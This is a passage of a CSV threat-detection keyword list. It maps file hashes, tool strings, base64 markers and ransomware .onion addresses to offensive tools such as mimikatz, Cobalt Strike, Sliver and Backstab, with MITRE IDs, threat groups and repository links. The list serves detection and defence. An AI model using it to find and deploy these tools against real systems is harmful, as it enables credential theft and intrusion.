Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35859" "*bf582077bbb7f317facb3705803f51a76fe47e740ff78c8dc0e393b32b6bbb10*",".{0,1000}bf582077bbb7f317facb3705803f51a76fe47e740ff78c8dc0e393b32b6bbb10.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35860" "*bf5a2aafdd2a8719cc733808bdb7009e6a7d4e6b889faa8a52e95b5ecc5d2337*",".{0,1000}bf5a2aafdd2a8719cc733808bdb7009e6a7d4e6b889faa8a52e95b5ecc5d2337.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","35861" "*bf64fa06291007eab0b142b91ee7ce9ab9657ddda240d98c141a0555da90cb4a*",".{0,1000}bf64fa06291007eab0b142b91ee7ce9ab9657ddda240d98c141a0555da90cb4a.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","35862" "*bf7004986efeeea71925695379ab87a74e22cb0bdab80e960fdeea8ce297fb9e*",".{0,1000}bf7004986efeeea71925695379ab87a74e22cb0bdab80e960fdeea8ce297fb9e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35864" "*bf7120a63483a2e4300a4d1405ac7525f11dd1f6d6a7120767bc42566da35891*",".{0,1000}bf7120a63483a2e4300a4d1405ac7525f11dd1f6d6a7120767bc42566da35891.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","35865" "*bf718d8a798eb9c98c107dd999d82a9326f152cd3db9a50d7b776f6a29033631*",".{0,1000}bf718d8a798eb9c98c107dd999d82a9326f152cd3db9a50d7b776f6a29033631.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35866" "*bf775ff84feda3935567eef986049ee3049f4533482594de7258eed927c7a270*",".{0,1000}bf775ff84feda3935567eef986049ee3049f4533482594de7258eed927c7a270.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon 
Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35867" "*bf7b774ef4abcd725e9d3a3ee569f83db21b2248056fcb3642099b005c089b6a*",".{0,1000}bf7b774ef4abcd725e9d3a3ee569f83db21b2248056fcb3642099b005c089b6a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","35868" "*bf8830d8ce61d2cb357a1f8a394f3220f9eaa02f436ab4bd98edb567b149c754*",".{0,1000}bf8830d8ce61d2cb357a1f8a394f3220f9eaa02f436ab4bd98edb567b149c754.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","35869" "*bf99eb1afc5b916e63a5b1ff607a8d79012ada12a2bbbb3ca9be3921dc16cfaa*",".{0,1000}bf99eb1afc5b916e63a5b1ff607a8d79012ada12a2bbbb3ca9be3921dc16cfaa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35874" "*bfa10eedfa3929b6a243b10035b9b29b7c84d87a1632e81dbc0d8ab1461f6c93*",".{0,1000}bfa10eedfa3929b6a243b10035b9b29b7c84d87a1632e81dbc0d8ab1461f6c93.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35876" "*bfa29dd2bd1a62ce4133eca34faa6f46005557eea07f3bf5c8b4afce8006160d*",".{0,1000}bfa29dd2bd1a62ce4133eca34faa6f46005557eea07f3bf5c8b4afce8006160d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY 
BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35877" "*bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421*",".{0,1000}bfa3e36c356afe0742ffc32a3693257aacf59a671b07f695e31bd0f334fe0421.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","35878" "*bfa9dc4c4b911b6777cb98d17a82b28531c26600698699cbe658749684818f28*",".{0,1000}bfa9dc4c4b911b6777cb98d17a82b28531c26600698699cbe658749684818f28.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","#filehash","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","35879" "*bfb4bd6ad9c59495256db7188a390d462d4e6edef6e7c33e403d6ed5808651f5*",".{0,1000}bfb4bd6ad9c59495256db7188a390d462d4e6edef6e7c33e403d6ed5808651f5.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - 
T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","35880" "*bfb894897287d8652d9aca74ece09adb061de853ed9b7707c1f72533cd22598f*",".{0,1000}bfb894897287d8652d9aca74ece09adb061de853ed9b7707c1f72533cd22598f.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","35881" "*bfb8f5783cc99fc57d9f2bc9f16229a6a0412017a5c215e0c76d70dd72ed7ce1*",".{0,1000}bfb8f5783cc99fc57d9f2bc9f16229a6a0412017a5c215e0c76d70dd72ed7ce1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","35883" "*bfc69bfe997864b9ed4fda70da541e4fbed3c9e05206d924d3a511a217dec83f*",".{0,1000}bfc69bfe997864b9ed4fda70da541e4fbed3c9e05206d924d3a511a217dec83f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35885" "*bfc94b31d4035a538e8ac59560846fbca0b0ad43a2e000e569b6d73ca2991341*",".{0,1000}bfc94b31d4035a538e8ac59560846fbca0b0ad43a2e000e569b6d73ca2991341.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35886" "*bfca678c800832025fe5e7c59bdf9bc3a2a62c77e7b689b943fee2821c2fec19*",".{0,1000}bfca678c800832025fe5e7c59bdf9bc3a2a62c77e7b689b943fee2821c2fec19.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","35887" "*bfd47d67a9d56cc3612fb0b5e92b048ed6d5ab1058efd7d25c03fc74698d002f*",".{0,1000}bfd47d67a9d56cc3612fb0b5e92b048ed6d5ab1058efd7d25c03fc74698d002f.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","35889" "*bfd8c2639bfe925869dbd7c0ee8ca9901e6939ea07fe52a2c469b1bf12c002a3*",".{0,1000}bfd8c2639bfe925869dbd7c0ee8ca9901e6939ea07fe52a2c469b1bf12c002a3.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","35890" "*bfe2e4b99edec9921d20bc7f956c1ac48cfc0b08061e23c92ab3461d7cdcf922*",".{0,1000}bfe2e4b99edec9921d20bc7f956c1ac48cfc0b08061e23c92ab3461d7cdcf922.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#filehash","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","35892" 
"*bfe6da625226d373022fe4c5f88ccfdbae6c102207b5a44d6aff3c5aed20a56d*",".{0,1000}bfe6da625226d373022fe4c5f88ccfdbae6c102207b5a44d6aff3c5aed20a56d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","35893" "*bfe768938d3186ff5a221c06902e18c4e67aa4d7c11b07aa54aeeb3746e31efe*",".{0,1000}bfe768938d3186ff5a221c06902e18c4e67aa4d7c11b07aa54aeeb3746e31efe.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","35894" "*bfee4c895d0f713cfc7c1a2f967ad8fdffc92c470e0edb8f0125959514445138*",".{0,1000}bfee4c895d0f713cfc7c1a2f967ad8fdffc92c470e0edb8f0125959514445138.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35896" "*bff5c33032fc4d1a25a3a569e72910b2dc500caf44b0d0baac16c4abd3868998*",".{0,1000}bff5c33032fc4d1a25a3a569e72910b2dc500caf44b0d0baac16c4abd3868998.{0,1000}","offensive_tool_keyword","Backstab","A tool to kill antimalware protected processes","T1562.001 - T1569 - T1059","TA0005 - TA0040 - TA0002","N/A","Black Basta - LockBit","Defense Evasion","https://github.com/Yaxser/Backstab","1","0","#filehash","N/A","10","10","1435","244","2021-06-19T20:01:52Z","2021-06-15T16:02:11Z","35897" 
"*bfnaelmomeimhlpmgjnjophhpkkoljpa*",".{0,1000}bfnaelmomeimhlpmgjnjophhpkkoljpa.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","35901" "*bG9nb25QYXNzd29yZHM=*",".{0,1000}bG9nb25QYXNzd29yZHM\=.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35902" "*bG9nb25QYXNzd29yZHM=*",".{0,1000}bG9nb25QYXNzd29yZHM\=.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#base64","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35903" "*bgetprivs*",".{0,1000}bgetprivs.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35904" "*bhashdump*",".{0,1000}bhashdump.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35905" "*bhd_enum_dconly*",".{0,1000}bhd_enum_dconly.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","35906" "*bhghoamapcdpbohphigoooaddinpkbai*",".{0,1000}bhghoamapcdpbohphigoooaddinpkbai.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","35907" "*bhhhlbepdkbapadjdnnojkbgioiodbic*",".{0,1000}bhhhlbepdkbapadjdnnojkbgioiodbic.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","35908" "*bHNhc3MuZXhl*",".{0,1000}bHNhc3MuZXhl.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#base64","base64 lsass.exe","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","35909" "*bhttp_x64.dll*",".{0,1000}bhttp_x64\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","35911" "*bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA*",".{0,1000}bHVrZXJlYWxseWlzdGhlbWFubXl0aGFuZGxlZ2VuZA.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - 
T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","35912" "*bianlianlbc5an4kgnay3opdemgcryg2kpfcbgczopmm3dnbz3uaunad.onion*",".{0,1000}bianlianlbc5an4kgnay3opdemgcryg2kpfcbgczopmm3dnbz3uaunad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","35913" "*bianlivemqbawcco4cx4a672k2fip3guyxudzurfqvdszafam3ofqgqd.onion*",".{0,1000}bianlivemqbawcco4cx4a672k2fip3guyxudzurfqvdszafam3ofqgqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","35914" "*bigb0sss/goPassGen*",".{0,1000}bigb0sss\/goPassGen.{0,1000}","offensive_tool_keyword","goPassGen","Easily-guessable Password Generator for Password Spray Attack","T1110 - T1110.003","TA0006 ","N/A","N/A","Exploitation tool","https://github.com/bigb0sss/goPassGen","1","1","N/A","N/A","8","1","21","1","2020-06-04T23:13:44Z","2020-06-04T22:33:37Z","35916" "*bin/*/PS2EXE/*",".{0,1000}bin\/.{0,1000}\/PS2EXE\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","35921" 
